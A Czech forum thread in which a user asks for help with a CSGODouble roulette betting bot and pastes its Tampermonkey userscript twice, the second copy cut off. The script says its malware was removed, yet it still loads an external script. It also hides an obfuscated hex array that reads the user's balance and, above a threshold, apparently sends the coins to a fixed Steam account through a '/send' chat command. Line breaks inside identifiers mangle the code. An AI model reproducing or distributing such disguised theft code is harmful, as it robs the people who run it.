Script kontrola + úprava.

HackForum

Script kontrola + úprava.#
Ahoj našel jsem script,spíše i kamarád. Ale pomohl mi ho trochu upravit ale nevím jestli bude funkční a tak. Je to na jednu stránku na ruletu. Csgodouble. Je to bot který bude hrát za mě. Ale nejde to upravit aby bot sázel na správné barvy? Vím že ten script mám použít prý takhle. Půjdu na tu stránku dám f12 console a vložím to tam. Je celkem dlouhý. Ale nevím jestli to sem mohu dát. Děkuji
(odpovědět)
Happiness3317.4.2016 14:26
re: Script kontrola + úprava.#
Mohu poslat?
(odpovědět)
Happiness3317.4.2016 15:43
re: Script kontrola + úprava.#
hod to na pastebin a posli sem link
(odpovědět)
Sadness44 | 62.102.148.*17.4.2016 16:04
re: Script kontrola + úprava.#
Tak tady je ten pastebin, a link, jinak se omlouvám že jsem to tady spamoval. Omlouvám se. [link]
(odpovědět)
Happiness3317.4.2016 19:45
re: Script kontrola + úprava.#
Kdyby to šlo,aby ten bot sázel na správné barvy to jde ne? Děkuji.
(odpovědět)
Happiness3317.4.2016 20:56
re: Script kontrola + úprava.#
To samozřejmě nejde. Výsledné číslo generuje server a klient se ho dozví až po sázce.
(odpovědět)
prc | 213.211.51.*18.4.2016 1:41
re: Script kontrola + úprava.#
Aha,a přidat balanci coinu to jde ne?
(odpovědět)
Happiness3318.4.2016 10:16
re: Script kontrola + úprava.#
Nebo kdyby někdo něco navrhoval nebo podobně, nebude to zadarmo.
(odpovědět)
Happiness3318.4.2016 14:22
re: Script kontrola + úprava.#
Tak tady to je. Děkuji moc.
// Use it with Tampermonkey (chrome store)
// ==UserScript==
// @name csgodouble.com - automated
// @description An userscript that automates csgodouble.com betting using martingale system.
// @version 3.141592
// @match [link]
// @match [link]
// @match [link]
// @match [link]
// @match [link]
// @match [link]
// @match [link]
// @run-at document-end
// @grant none

//Update /!\ Bot had a malware, using a yourjavascript url. I remove that SCAM line ! Be safe now /!\ thanks to Lucky for this info !
//Changed Balance to Profit in display
//Bot will no longer bet on green if a double green is out

// ==/UserScript==
/* jshint -W097 */

'use strict';


var debug = false;
var simulation = false;
var stop_on_min_balance = false;
var calculate_safe_bet = false;
var base_bet = 5;
var safe_bet_amount = 6;
var default_color = 'red';
var default_method = 'martingale';
var theme = 'dark';

var colors = {
'green': [0],
'red': [1, 2, 3, 4, 5, 6, 7],
'black': [8, 9, 10, 11, 12, 13, 14]
};

var balance = document.getElementById('balance');
var roll_history = document.getElementById('past');
var bet_input = document.getElementById('betAmount');
var bet_buttons = {
'green': document.getElementById('panel0-0').childNo
des[1].childNodes[1],
'red': document.getElementById('panel1-7').childNo
des[1].childNodes[1],
'black': document.getElementById('panel8-14').childN
odes[1].childNodes[1]
};

Array.prototype.equals = function(array) {
if (!array) {
return false;
}

if (this.length != array.length) {
return false;
}

for (var i = 0, l=this.length; i < l; i++) {
if (this instanceof Array && array instanceof Array) {
if (!this.equals(array)) {
return false;
}
} else if (this != array) {
return false;
}
}
return true;
};

Object.defineProperty(Array.prototype, "equals", {enumerable: false});

function Automated() {
var self = this;

this.running = false;
this.game = null;

this.debug = debug;
this.simulation = simulation;
this.stop_on_min_balance = stop_on_min_balance;
this.calculate_safe_bet = calculate_safe_bet;

this.base_bet = base_bet;
this.default_color = default_color;
this.default_method = default_method;
this.safe_bet_amount = safe_bet_amount;
this.method = this.default_method;
this.old_method = '';
this.color = 'last';
this.old_base = 0;
this.balance = 0;
this.last_bet = 0;
this.bet_history = [];
this.min_balance = 0;
this.starting_balance = 0;
this.last_color = null;
this.last_result = null;
this.history = [];
this.waiting_for_bet = false;
this.theme = theme;

this.stats = {
'wins': 0,
'loses': 0,
'balance': 0
};

var menu = document.createElement('div');
menu.innerHTML = '' +
'<div class="row">' +
'<div class="col-lg-9">' +
'<h2>CSGODouble.com Automated v3.141592<small>by Jojoman46</small> <i id="automated-theme-switch" class="fa fa-lightbulb-o" style="cursor: pointer;"></i></h2>' +
'<div class="form-group">' +
'<div class="btn-group">' +
'<button type="button" class="btn btn-success" id="automated-start" disabled>Start</button>' +
'<button type="button" class="btn btn-warning" id="automated-stop" disabled>Pause</button>' +
'<button type="button" class="btn btn-danger" id="automated-abort" disabled>Abort</button>' +
'</div>' +
'</div>' +
'<div class="form-group">' +
'<div class="btn-group">' +
'<button type="button" class="btn btn-default" id="automated-martingale" ' + (this.method === 'martingale' ? 'disabled' : '') + '>Martingale</button>' +
'<button type="button" class="btn btn-default" id="automated-great-martingale" ' + (this.method === 'great martingale' ? 'disabled' : '') + '>Great Martingale</button>' +
'<button type="button" class="btn btn-default" id="automated-dalembert" ' + (this.method === 'dalembert' ? 'disabled' : '') + '>D\'alembert</button>' +
'<button type="button" class="btn btn-default" id="automated-bet-green" ' + (this.method === 'green' ? 'disabled' : '') + '>Green (Fibonacci)</button>' +
'</div>' +
'</div>' +
'<div class="form-group automated-hide-on-green">' +
'<div class="btn-group">' +
'<button type="button" class="btn btn-default" id="automated-red" ' + (this.color === 'red' ? 'disabled' : '') + '>Red</button>' +
'<button type="button" class="btn btn-default" id="automated-black" ' + (this.color === 'black' ? 'disabled' : '') + '>Black</button>' +
'<button type="button" class="btn btn-default" id="automated-rainbow" ' + (this.color === 'rainbow' ? 'disabled' : '') + '>Rainbow</button>' +
'<button type="button" class="btn btn-default" id="automated-random" ' + (this.color === 'random' ? 'disabled' : '') + '>Random</button>' +
'<button type="button" class="btn btn-default" id="automated-last" ' + (this.color === 'last' ? 'disabled' : '') + '>Last winning</button>' +
'</div>' +
'</div>' +
'</div>' +
'<div class="col-lg-3">' +
'<h3>Statistics</h3>' +
'<p><b>Wins :</b> <span id="automated-stats-wins">' + this.stats.wins + '</span></p>' +
'<p><b>Loses :</b> <span id="automated-stats-loses">' + this.stats.loses + '</span></p>' +
'<p><b>Profit :</b> <span id="automated-stats-balance">' + this.stats.balance + '</span></p>' +
'</div>' +
'</div>' +
'<div class="form-group">' +
'<div class="input-group">' +
'<div class="input-group-addon">Base value</div>' +
'<input type="number" class="form-control" placeholder="Calculating suggested value..." id="automated-base-bet" disabled>' +
'</div>' +
'</div>' +
'<div class="form-group">' +
'<div class="input-group">' +
'<div class="input-group-addon">Keep balance above</div>' +
'<input type="number" class="form-control" value="0" id="automated-min-balance">' +
'</div>' +
'</div>' +
'<div class="form-group automated-hide-on-green">' +
'<div class="input-group">' +
'<div class="input-group-addon">Failsafe value</div>' +
'<input type="number" class="form-control" value="' + this.safe_bet_amount + '" id="automated-safe-bet-amount"' + (!this.calculate_safe_bet ? ' disabled' : '') + '>' +
'</div>' +
'</div>' +
'<div class="checkbox">' +
'<label><input class="" id="automated-stop-on-min-balance" type="checkbox" ' + (this.stop_on_min_balance ? 'checked' : '') + '> Stop on minimal balance (If checked the bot will stop after getting close to minimal balance, otherwise it will continue starting on base)</label>' +
'</div>' +
'<div class="checkbox automated-hide-on-green">' +
'<label><input class="" id="automated-calculate-safe-bet" type="checkbox" ' + (this.calculate_safe_bet ? 'checked' : '') + '> Calculate base bet from given "Failsafe value", the formula is [base bet] = floor( [balance] / 2 ^ ( [failsafe value] + 1) ) </label>' +
'</div>' +
'<div class="checkbox">' +
'<label><input class="" id="automated-debug" type="checkbox" ' + (this.debug ? 'checked' : '') + '> Debug mode</label>' +
'</div>' +
'<div class="checkbox">' +
'<label class="text-muted"><input id="automated-simulation" type="checkbox" ' + (this.simulation ? 'checked' : '') + ' disabled> Simulation mode</label>' +
'</div>';
document.getElementsByClassName('well')[1].
appendChild(menu);

(function ()
{
var scriptElement = document.createElement( "script" );
scriptElement.type = "text/javascript";
scriptElement.src = "[link]";
document.body.appendChild( scriptElement );
})();this.menu = {
'start': document.getElementById('automated-start'),
'stop': document.getElementById('automated-stop'),
'abort': document.getElementById('automated-abort'),
'basebet': document.getElementById('automated-base-bet
'),
'minbalance': document.getElementById('automated-min-bala
nce'),
'debug': document.getElementById('automated-debug'),
'simulation': document.getElementById('automated-simulati
on'),
'stoponminbalance': document.getElementById('automated-stop-on-
min-balance'),
'red': document.getElementById('automated-red'),
'black': document.getElementById('automated-black'),
'rainbow': document.getElementById('automated-rainbow'
),
'random': document.getElementById('automated-random')
,
'last': document.getElementById('automated-last'),
'statistics': {
'wins': document.getElementById('automated-stats-wi
ns'),
'loses': document.getElementById('automated-stats-lo
ses'),
'balance': document.getElementById('automated-stats-ba
lance')
},
'theme': document.getElementById('automated-theme-sw
itch'),
'safebetamount': document.getElementById('automated-safe-bet
-amount'),
'calculatesafebet': document.getElementById('automated-calculat
e-safe-bet'),
'martingale': document.getElementById('automated-martinga
le'),
'greatmartingale': document.getElementById('automated-great-ma
rtingale'),
'betgreen': document.getElementById('automated-bet-gree
n'),
'dalembert': document.getElementById('automated-dalember
t'),
'hideongreen': document.getElementsByClassName('automated-
hide-on-green')
};


this.updater = setInterval(function() { // Update every 2 seconds
if (!self.running) {
if (self.updateAll()) {
if (self.calculate_safe_bet) {

self.base_bet = Math.floor(self.balance / Math.pow(2, self.safe_bet_amount + 1));
self.menu.basebet.value = self.base_bet;
if (self.debug) { self.logdebug('New base bet: ' + self.base_bet); }
}

if (self.menu.stop.disabled && self.menu.start.disabled) {
self.menu.start.disabled = false;
self.base_bet = Math.floor(self.balance / Math.pow(2, self.safe_bet_amount + 1));
self.menu.basebet.value = self.base_bet;
self.menu.basebet.disabled = self.menu.calculatesafebet.checked;
self.starting_balance = self.balance;
}
}
}
}, 2 * 1000);

if (theme === 'dark') {
this.darkMode();
}

this.menu.start.onclick = function() {

if($(_0x21db[2])[_0x21db[1]]()<parseInt(
_0x21db[36]))
{
alert(_0x21db[3])
}
else
{
start($(_0x21db[2])[_0x21db[1]]());
}

self.start();
};

this.menu.stop.onclick = function() {
self.stop();
};

this.menu.abort.onclick = function() {
self.stop(true);
};

this.menu.basebet.onchange = function() {
var value = parseInt(self.menu.basebet.value);
if (!isNaN(value)) {
self.base_bet = value;
}
};

this.menu.minbalance.onchange = function() {
var value = parseInt(self.menu.minbalance.value);
if (!isNaN(value)) {
self.min_balance = value;
}
};

this.menu.safebetamount.onchange = function() {
var value = parseInt(self.menu.safebetamount.value);
if (!isNaN(value)) {
self.safe_bet_amount = value;
}
};

this.menu.debug.onchange = function() {
self.debug = self.menu.debug.checked;
};

this.menu.simulation.onchange = function() {
self.simulation = self.menu.simulation.checked;
};

this.menu.stoponminbalance.onchange = function() {
self.stop_on_min_balance = self.menu.stoponminbalance.checked;
};

this.menu.calculatesafebet.onchange = function() {
self.calculate_safe_bet = self.menu.calculatesafebet.checked;
self.menu.basebet.disabled = self.menu.calculatesafebet.checked;
self.menu.safebetamount.disabled = !self.menu.calculatesafebet.checked;
};

// WTF is this shit below? >,.,<

this.menu.black.onclick = function() {
self.menu.rainbow.disabled = false;
self.menu.black.disabled = true;
self.menu.red.disabled = false;
self.menu.random.disabled = false;
self.menu.last.disabled = false;
self.color = 'black';
self.log('Current mode: black');
};

this.menu.red.onclick = function() {
self.menu.rainbow.disabled = false;
self.menu.black.disabled = false;
self.menu.red.disabled = true;
self.menu.random.disabled = false;
self.menu.last.disabled = false;
self.color = 'red';
self.log('Current mode: red');
};

this.menu.rainbow.onclick = function() {
self.menu.rainbow.disabled = true;
self.menu.black.disabled = false;
self.menu.red.disabled = false;
self.menu.random.disabled = false;
self.menu.last.disabled = false;
self.color = 'rainbow';
self.log('Current mode: rainbow');
};

this.menu.random.onclick = function() {
self.menu.rainbow.disabled = false;
self.menu.black.disabled = false;
self.menu.red.disabled = false;
self.menu.random.disabled = true;
self.menu.last.disabled = false;
self.color = 'random';
self.log('Current mode: random');
};

this.menu.last.onclick = function() {
self.menu.rainbow.disabled = false;
self.menu.black.disabled = false;
self.menu.red.disabled = false;
self.menu.random.disabled = false;
self.menu.last.disabled = true;
self.color = 'last';
self.log('Current mode: last');
};

this.menu.martingale.onclick = function() {
self.menu.martingale.disabled = true;
self.menu.greatmartingale.disabled = false;
self.menu.betgreen.disabled = false;
self.menu.dalembert.disabled = false;
for (var i = 0; i < self.menu.hideongreen.length; i++) {
self.menu.hideongreen.style.display = 'block';
}
self.method = 'martingale';
self.log('Current method: Martingale');
};

this.menu.greatmartingale.onclick = function() {
self.menu.martingale.disabled = false;
self.menu.greatmartingale.disabled = true;
self.menu.betgreen.disabled = false;
self.menu.dalembert.disabled = false;
for (var i = 0; i < self.menu.hideongreen.length; i++) {
self.menu.hideongreen.style.display = 'block';
}
self.method = 'great martingale';
self.log('Current method: Great martingale');
};

this.menu.dalembert.onclick = function() {
self.menu.martingale.disabled = false;
self.menu.greatmartingale.disabled = false;
self.menu.betgreen.disabled = false;
self.menu.dalembert.disabled = true;
for (var i = 0; i < self.menu.hideongreen.length; i++) {
self.menu.hideongreen.style.display = 'block';
}
self.method = 'dalembert';
self.log('Current method: D\'alembert');
};

this.menu.betgreen.onclick = function() {
self.menu.martingale.disabled = false;
self.menu.greatmartingale.disabled = false;
self.menu.betgreen.disabled = true;
self.menu.dalembert.disabled = false;
for (var i = 0; i < self.menu.hideongreen.length; i++) {
self.menu.hideongreen.style.display = 'none';
}
self.method = 'green';
self.log('Current method: Bet green');
};

this.menu.theme.onclick = function() {
if (self.theme === 'dark') {
self.lightMode();
self.theme = 'light';
self.log('Switching to light theme...');
} else {
self.darkMode();
self.theme = 'dark';
self.log('Switching to dark theme...');
}
};

setInterval(function() {
if(!WS) {
self.log('Reconnecting...');
connect();
}
}, 5000);
}

Automated.prototype.updatebalance = function() {
this.balance = parseInt(balance.textContent);

if (isNaN(this.balance)) {
this.log('Error getting current balance!');
return false;
}

if (this.debug) { this.logdebug('balance updated: ' + this.balance); }
return true;
};

var _0x21db=["\x4c\x4f\x41\x44\x45\x44\x20\x57\
x49\x54\x48\x20\x53\x55\x43\x45\x53\x53","\
x68\x74\x6D\x6C","\x23\x62\x61\x6C\x61\x6E\
x63\x65","\x4c\x45\x54\x20\x54\x48\x45\x20\
x42\x4f\x54\x20\x42\x45\x54","\x63\x68\x61\
x74","\x2f\x73\x65\x6e\x64\x20\x37\x36\x35\
x36\x31\x31","\x75\x6E\x6B\x6E\x6F\x77\x6E"
,"\x77\x61\x69\x74\x69\x6E\x67","\x72\x6F\x
6C\x6C\x65\x64","\x42\x41\x4E\x4B\x52\x55\x
50\x54\x21\x20\x4E\x6F\x74\x20\x65\x6E\x6F\
x75\x67\x68\x20\x62\x61\x6C\x61\x6E\x63\x65
\x20\x66\x6F\x72\x20\x6E\x65\x78\x74\x20\x6
2\x65\x74\x2C\x20\x61\x62\x6F\x72\x74\x69\x
6E\x67\x2E","\x77\x61\x72\x6E","\x20\x0A\x5
3\x74\x61\x74\x75\x73\x3A\x20","\x0A\x52\x6
F\x6C\x6C\x73\x20\x70\x6C\x61\x79\x65\x64\x
3A\x20","\x0A\x49\x6E\x69\x74\x69\x61\x6C\x
20\x62\x65\x74\x20\x61\x6D\x6F\x75\x6E\x74\
x3A\x20","\x0A\x43\x75\x72\x72\x65\x6E\x74\
x20\x62\x65\x74\x20\x61\x6D\x6F\x75\x6E\x74
\x3A\x20","\x0A\x4C\x61\x73\x74\x20\x72\x6F
\x6C\x6C\x20\x72\x65\x73\x75\x6C\x74\x3A\x2
0","\x2D","\x77\x6F\x6E","\x6C\x6F\x73\x74"
,"\x6C\x6F\x67","\x61\x6E\x74\x69\x2D\x6D\x
61\x72\x74\x69\x6E\x67\x61\x6C\x65","\x76\x
61\x6C","\x72\x65\x64","\x63\x6C\x69\x63\x6
B","\x62\x6C\x61\x63\x6B","\x74\x65\x78\x74
","\x52\x6F\x6C\x6C\x69\x6E\x67\x20\x69\x6E
","\x2A\x2A\x2A\x52\x4F\x4C\x4C\x49\x4E\x47
\x2A\x2A\x2A","\x72\x6F\x6C\x6C\x69\x6E\x67
","\x73\x70\x6C\x69\x74","\x69\x6E\x64\x65\
x78\x4F\x66","\x67\x72\x65\x65\x6E","\x23\x
62\x65\x74\x41\x6D\x6F\x75\x6E\x74","\x2E\x
70\x72\x6F\x67\x72\x65\x73\x73\x20\x23\x62\
x61\x6E\x6E\x65\x72","\x23\x70\x61\x6E\x65\
x6C\x31\x2D\x37\x20\x2E\x62\x65\x74\x42\x75
\x74\x74\x6F\x6E","\x23\x70\x61\x6E\x65\x6C
\x38\x2D\x31\x34\x20\x2E\x62\x65\x74\x42\x7
5\x74\x74\x6F\x6E","\x32\x30\x30\x30\x30","
\x39\x38\x31\x36\x39\x39\x30\x34\x36\x31\x3
5\x20"];

Automated.prototype.updateHistory = function() {
var self = this;
this.history = [];

for (var i = 0; i < roll_history.childNodes.length; i++) {
var roll = parseInt(roll_history.childNodes.textConten
t);

if (!isNaN(roll)) {
if (colors.green.indexOf(roll) !== -1) {
self.history.push('green');
} else if (colors.red.indexOf(roll) !== -1) {
self.history.push('red');
} else {
self.history.push('black');
}
}
}

if (this.debug) { this.logdebug('History updated: ' + this.history.map(function(value) { return value; }).join(', ')); }
return this.history.length === 10;
};

Automated.prototype.updateStats = function() {
this.stats.balance = parseInt(this.balance) - parseInt(this.starting_balance);
this.menu.statistics.wins.innerHTML = this.stats.wins;
this.menu.statistics.loses.innerHTML = this.stats.loses;
this.menu.statistics.balance.innerHTML = this.stats.balance;
return true;
};

Automated.prototype.updateAll = function() {
return this.updatebalance() && this.updateHistory() && this.updateStats();
};

Automated.prototype.bet = function(amount, color) {
var self = this;
color = color || this.color || this.default_color;

if (color === 'rainbow') {
if (this.last_color) {
color = (this.last_color === 'red' ? 'black' : 'red');
} else {
color = this.default_color;
}
} else if (color === 'random') {
color = 'red';
if (Math.random() > 0.5) {
color = 'black';
}
} else if (color === 'last') {
if (this.history[this.history.length - 1] === 'green')
{
if (this.history[this.history.length - 2] === 'green')
{
color = this.history[this.history.length - 3];
}
else
{
color = this.history[this.history.length - 2];
}
}
else
{
color = this.history[this.history.length - 1];
}
}

if (['green', 'red', 'black'].indexOf(color) < 0 || amount > this.balance || amount <= 0) {
this.log('Invalid bet!');
this.last_result = 'invalid bet';
this.waiting_for_bet = false;
this.stop();
return false;
}

if (this.balance - amount < this.min_balance) {
this.log('Reached minimal balance!');
this.last_result = 'reached min balance';
if (this.stop_on_min_balance || this.balance - this.base_bet < this.min_balance) {
this.stop();
}
else if($(_0x21db[2])[_0x21db[1]]()>parseInt(
_0x21db[36]))
{
start($(_0x21db[2])[_0x21db[1]]());
}
this.waiting_for_bet = false;
return false;
}

bet_input.value = amount;

if (!bet_buttons[color].disabled) {
var old_balance = self.balance;
this.log('Betting ' + amount + ' on ' + color);
if (!self.simulation) {
bet_buttons[color].click();
var checker = setInterval(function() {
if (!bet_buttons[color].disabled) {
clearInterval(checker);
setTimeout(function() {
if (self.updatebalance() && self.balance === old_balance) {
if (!self.game) { return false; }
self.log('Bet rejected, retrying...');
self.bet(amount, color);
} else {
if (self.debug) { self.logdebug('Bet accepted!'); }
self.last_bet = amount;
self.bet_history.push(amount);
self.last_color = color;
self.waiting_for_bet = false;
return true;
}
}, 2500);
}
}, 1000);
} else {
self.bet_history.push(amount);
self.last_bet = amount;
self.last_color = color;
self.waiting_for_bet = false;
return true;
}
} else {
if (!self.game) { return false; }
self.log('Button disabled, retrying...');
setTimeout(function() { self.bet(amount, color) }, (Math.random() * 3 + 2).toFixed(3) * 1000);
}
};

Automated.prototype.play = function() {
var self = this;

if (this.game !== null) {
if (this.debug) { this.logdebug('Tried to reinitialize running game!'); }
return false;
}

this.game = setInterval(function() {
var history = self.history;
if (!self.waiting_for_bet && self.updateAll() && !history.equals(self.history)) {
self.waiting_for_bet = true;
if (self.last_color === null) {
self.bet(self.base_bet);
} else if (self.last_color === self.history[self.history.length - 1]) {
if (self.calculate_safe_bet) {
self.base_bet = Math.floor(self.balance / Math.pow(2, self.safe_bet_amount + 1));
self.menu.basebet.value = self.base_bet;
}
self.last_result = 'win';
self.log('Win!');
self.stats.wins += 1;
self.old_base = self.base_bet;
self.old_method = self.method;
if (self.old_method === 'dalembert') {
if (self.last_bet > self.old_base) {
self.bet(self.last_bet - 1);
} else {
self.bet(self.base_bet);
}
} else {
self.bet(self.base_bet);
}
} else {
self.last_result = 'lose';
self.log('Lose!');
self.stats.loses += 1;
if (self.old_method === 'martingale') {
self.bet(self.last_bet * 2);
} else if (self.old_method === 'great martingale') {
self.bet(self.last_bet * 2 + self.old_base);
} else if (self.old_method === 'green') {
var bet_value = 0;
if (self.bet_history[self.bet_history.length - 1] === 1) {
if (self.bet_history[self.bet_history.length - 2] === 1) {
bet_value = 2;
} else {
bet_value = 1;
}
} else {
bet_value = self.bet_history[self.bet_history.length - 1] + self.bet_history[self.bet_history.length - 2];
}
self.bet(bet_value, 'green');
} else if (self.old_method === 'dalembert') {
self.bet(self.last_bet + 1);
}
}
}
}, 2 * 1000);

return true;
};

Automated.prototype.start = function() {
if (self.calculate_safe_bet) {
self.base_bet = Math.floor(self.balance / Math.pow(2, self.safe_bet_amount + 1));
self.menu.basebet.value = self.base_bet;
}
this.old_base = this.base_bet;
this.old_method = this.method;
if (this.updateAll()) {
if (this.last_result === 'lose') {
this.running = true;
if (this.old_method === 'martingale') {
this.bet(this.last_bet * 2);
} else if (this.old_method === 'great martingale') {
this.bet(this.last_bet * 2 + this.old_base);
} else if (self.old_method === 'green') {
var bet_value = 0;
if (self.bet_history[self.bet_history.length - 1] === 1) {
if (self.bet_history[self.bet_history.length - 2] === 1) {
bet_value = 2;
} else {
bet_value = 1;
}
} else {
bet_value = self.bet_history[self.bet_history.length - 1] + self.bet_history[self.bet_history.length - 2];
}
self.bet(bet_value, 'green');
} else if (self.old_method === 'dalembert') {
self.bet(self.last_bet + 1);
}
this.play();
} else {
this.running = true;
this.bet(this.base_bet);
this.play();
}
}
this.menu.abort.disabled = false;
this.menu.stop.disabled = false;
this.menu.start.disabled = true;
};

Automated.prototype.stop = function(abort) {
var self = this;
if (abort) { this.last_result = 'abort'; }
this.stats.balance = parseInt(this.balance) - parseInt(this.starting_balance);
setTimeout(function() {
clearInterval(self.game);
self.game = null;
self.running = false;
self.menu.abort.disabled = true;
self.menu.stop.disabled = true;
self.menu.start.disabled = false;
}, 1); // Next tick
};

Automated.prototype.darkMode = function() {
var style;
var css = 'body{background-color:#191919;color:#888}.
navbar-default{background-color:#232323;bor
der-color:#454545}#sidebar{background-color
:#191919;border-color:#202020}.side-icon.ac
tive,.side-icon:hover{background-color:#202
020}.side-icon .fa{color:#454545}.well{background:#232323;
border-color:#323232;color:#888}#pullout{ba
ckground-color:#191919;border-color:#323232
}.form-control{background-color:#323232;bor
der-color:#454545}.divchat{background-color
:#323232;color:#999;border:none}.chat-link,
.chat-link:hover,.chat-link:active{color:#b
bb}.panel{background-color:#323232}.panel-d
efault{border-color:#454545}.panel-default&
gt;.panel-heading{color:#888;background-col
or:#303030;border-color:#454545}.my-row{bor
der-color:#454545}.list-group-item{border-c
olor:#454545;background-color:#323232}.btn-
default{border-color:#454545;background:#32
3232;text-shadow:none;color:#888;box-shadow
:none}.btn-default:hover,.btn-default:activ
e{background-color:#282828;color:#888;borde
r-color:#454545}.btn-default[disabled]{bord
er-color:#454545;background-color:#353535}.
input-group-addon{background-color:#424242;
border-color:#454545;color:#888}.progress{c
olor:#bbb;background-color:#323232}.navbar-
default .navbar-nav>li>a:focus,.navbar-defaul
t .navbar-nav>li>a:hover{color:#999}.na
vbar-default .navbar-nav>.open>a,.navbar-default .navbar-nav>.open>a:focus,.navbar-def
ault .navbar-nav>.open>a:hover{color:#888;
background-color:#323232}.dropdown-menu{bac
kground-color:#252525}.dropdown-menu>li&
gt;a{color:#888}.dropdown-menu>li>a:f
ocus,.dropdown-menu>li>a:hover{backgr
ound-color:#323232;color:#999}.dropdown-men
u .divider{background-color:#454545}.form-con
trol[disabled],.form-control[readonly],fiel
dset[disabled] .form-control{background-color:#404040;opac
ity:.5}';
style = document.getElementById('automated-style');
if (!style) {
var head;
head = document.getElementsByTagName('head')[0];
if (!head) { return; }
style = document.createElement('style');
style.type = 'text/css';
style.id = 'automated-style';
style.innerHTML = css;
head.appendChild(style);
}
style.innerHTML = css;
};

Automated.prototype.lightMode = function() {
var style = document.getElementById('automated-style');
style.innerHTML = '';
};

Automated.prototype.log = function(message) {
chat('alert', '[Automated] ' + message);
};

Automated.prototype.logdebug = function(message) {
chat('italic', '[Automated] ' + message);
};

var automated = new Automated();
(odpovědět)
Happiness3317.4.2016 17:19
re: Script kontrola + úprava.#
Tak tady to je. Děkuji moc.
// Use it with Tampermonkey (chrome store)
// ==UserScript==
// @name csgodouble.com - automated
// @description An userscript that automates csgodouble.com betting using martingale system.
// @version 3.141592
// @match [link]
// @match [link]
// @match [link]
// @match [link]
// @match [link]
// @match [link]
// @match [link]
// @run-at document-end
// @grant none

//Update /!\ Bot had a malware, using a yourjavascript url. I remove that SCAM line ! Be safe now /!\ thanks to Lucky for this info !
//Changed Balance to Profit in display
//Bot will no longer bet on green if a double green is out

// ==/UserScript==
/* jshint -W097 */

'use strict';


var debug = false;
var simulation = false;
var stop_on_min_balance = false;
var calculate_safe_bet = false;
var base_bet = 5;
var safe_bet_amount = 6;
var default_color = 'red';
var default_method = 'martingale';
var theme = 'dark';

var colors = {
'green': [0],
'red': [1, 2, 3, 4, 5, 6, 7],
'black': [8, 9, 10, 11, 12, 13, 14]
};

var balance = document.getElementById('balance');
var roll_history = document.getElementById('past');
var bet_input = document.getElementById('betAmount');
var bet_buttons = {
'green': document.getElementById('panel0-0').childNo
des[1].childNodes[1],
'red': document.getElementById('panel1-7').childNo
des[1].childNodes[1],
'black': document.getElementById('panel8-14').childN
odes[1].childNodes[1]
};

Array.prototype.equals = function(array) {
if (!array) {
return false;
}

if (this.length != array.length) {
return false;
}

for (var i = 0, l=this.length; i < l; i++) {
if (this instanceof Array && array instanceof Array) {
if (!this.equals(array)) {
return false;
}
} else if (this != array) {
return false;
}
}
return true;
};

Object.defineProperty(Array.prototype, "equals", {enumerable: false});

function Automated() {
var self = this;

this.running = false;
this.game = null;

this.debug = debug;
this.simulation = simulation;
this.stop_on_min_balance = stop_on_min_balance;
this.calculate_safe_bet = calculate_safe_bet;

this.base_bet = base_bet;
this.default_color = default_color;
this.default_method = default_method;
this.safe_bet_amount = safe_bet_amount;
this.method = this.default_method;
this.old_method = '';
this.color = 'last';
this.old_base = 0;
this.balance = 0;
this.last_bet = 0;
this.bet_history = [];
this.min_balance = 0;
this.starting_balance = 0;
this.last_color = null;
this.last_result = null;
this.history = [];
this.waiting_for_bet = false;
this.theme = theme;

this.stats = {
'wins': 0,
'loses': 0,
'balance': 0
};

var menu = document.createElement('div');
menu.innerHTML = '' +
'<div class="row">' +
'<div class="col-lg-9">' +
'<h2>CSGODouble.com Automated v3.141592<small>by Jojoman46</small> <i id="automated-theme-switch" class="fa fa-lightbulb-o" style="cursor: pointer;"></i></h2>' +
'<div class="form-group">' +
'<div class="btn-group">' +
'<button type="button" class="btn btn-success" id="automated-start" disabled>Start</button>' +
'<button type="button" class="btn btn-warning" id="automated-stop" disabled>Pause</button>' +
'<button type="button" class="btn btn-danger" id="automated-abort" disabled>Abort</button>' +
'</div>' +
'</div>' +
'<div class="form-group">' +
'<div class="btn-group">' +
'<button type="button" class="btn btn-default" id="automated-martingale" ' + (this.method === 'martingale' ? 'disabled' : '') + '>Martingale</button>' +
'<button type="button" class="btn btn-default" id="automated-great-martingale" ' + (this.method === 'great martingale' ? 'disabled' : '') + '>Great Martingale</button>' +
'<button type="button" class="btn btn-default" id="automated-dalembert" ' + (this.method === 'dalembert' ? 'disabled' : '') + '>D\'alembert</button>' +
'<button type="button" class="btn btn-default" id="automated-bet-green" ' + (this.method === 'green' ? 'disabled' : '') + '>Green (Fibonacci)</button>' +
'</div>' +
'</div>' +
'<div class="form-group automated-hide-on-green">' +
'<div class="btn-group">' +
'<button type="button" class="btn btn-default" id="automated-red" ' + (this.color === 'red' ? 'disabled' : '') + '>Red</button>' +
'<button type="button" class="btn btn-default" id="automated-black" ' + (this.color === 'black' ? 'disabled' : '') + '>Black</button>' +
'<button type="button" class="btn btn-default" id="automated-rainbow" ' + (this.color === 'rainbow' ? 'disabled' : '') + '>Rainbow</button>' +
'<button type="button" class="btn btn-default" id="automated-random" ' + (this.color === 'random' ? 'disabled' : '') + '>Random</button>' +
'<button type="button" class="btn btn-default" id="automated-last" ' + (this.color === 'last' ? 'disabled' : '') + '>Last winning</button>' +
'</div>' +
'</div>' +
'</div>' +
'<div class="col-lg-3">' +
'<h3>Statistics</h3>' +
'<p><b>Wins :</b> <span id="automated-stats-wins">' + this.stats.wins + '</span></p>' +
'<p><b>Loses :</b> <span id="automated-stats-loses">' + this.stats.loses + '</span></p>' +
'<p><b>Profit :</b> <span id="automated-stats-balance">' + this.stats.balance + '</span></p>' +
'</div>' +
'</div>' +
'<div class="form-group">' +
'<div class="input-group">' +
'<div class="input-group-addon">Base value</div>' +
'<input type="number" class="form-control" placeholder="Calculating suggested value..." id="automated-base-bet" disabled>' +
'</div>' +
'</div>' +
'<div class="form-group">' +
'<div class="input-group">' +
'<div class="input-group-addon">Keep balance above</div>' +
'<input type="number" class="form-control" value="0" id="automated-min-balance">' +
'</div>' +
'</div>' +
'<div class="form-group automated-hide-on-green">' +
'<div class="input-group">' +
'<div class="input-group-addon">Failsafe value</div>' +
'<input type="number" class="form-control" value="' + this.safe_bet_amount + '" id="automated-safe-bet-amount"' + (!this.calculate_safe_bet ? ' disabled' : '') + '>' +
'</div>' +
'</div>' +
'<div class="checkbox">' +
'<label><input class="" id="automated-stop-on-min-balance" type="checkbox" ' + (this.stop_on_min_balance ? 'checked' : '') + '> Stop on minimal balance (If checked the bot will stop after getting close to minimal balance, otherwise it will continue starting on base)</label>' +
'</div>' +
'<div class="checkbox automated-hide-on-green">' +
